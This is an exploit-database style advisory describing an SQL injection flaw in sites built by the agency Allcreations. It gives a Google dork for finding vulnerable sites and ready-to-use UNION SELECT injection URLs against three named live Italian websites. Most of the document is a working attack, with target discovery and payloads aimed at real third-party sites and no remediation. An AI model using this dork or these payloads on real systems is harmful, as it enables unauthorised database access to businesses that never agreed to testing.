############In The Name Of God############ # Exploit Title : Allcreations SQL injection Vulnerability # Exploit Author : modiret # Vendor Homepage : http://allcreations.it/ # Google Dork : "Realizzazione siti web e grafica: allcreations.it" inurl:.php? # Date: 30 Dec 2015 # Tested On : Win 10 / Google Chrome / Mozilla Firefox ##################################### # PoC: # http://www.villaiaia.it/galleria.php?id=[SQLI] # # demos : # http://www.villaiaia.it/galleria.php?id=-3%27+union+select+1,version()--%20- # http://www.cometannamaria.it/galleria.php?id=-6%27+union+select+1,version()--%20- # http://www.alessandrasposa.it/galleria.php?id=-3%27+union+select+1,version(),3,4--%20- ##################################### # Contact Me:Yahoo Messenger:amodiret@yahoo.com #####################################